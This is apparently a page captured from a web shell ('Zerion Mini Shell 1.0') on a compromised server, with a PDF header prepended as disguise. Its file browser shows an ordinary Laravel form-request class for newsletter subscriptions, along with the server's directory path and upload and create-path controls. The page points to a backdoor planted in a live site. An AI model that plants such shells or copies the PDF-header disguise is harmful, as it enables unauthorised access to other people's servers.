%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/www/html/news/app/Http/Requests/Subscription/
Upload File :
Create Path :
Current File : /var/www/html/news/app/Http/Requests/Subscription/SubscriptionStoreRequest.php

<?php

namespace App\Http\Requests\Subscription;

use App\Http\Requests\BaseRequest;

class SubscriptionStoreRequest extends BaseRequest
{
    /**
     * Determine if the user is authorized to make this request.
     *
     * @return bool
     */
    public function authorize()
    {
        return true;
    }

    /**
     * Get the validation rules that apply to the request.
     *
     * @return array
     */
    public function rules()
    {
        return [
            'firstname' => 'string',
            'lastname'  => 'string',
            'email'     => 'required|email|unique:subscriptions,email',
        ];
    }

    public function getSanitationRules()
    {
        return [];
    }

}

Zerion Mini Shell 1.0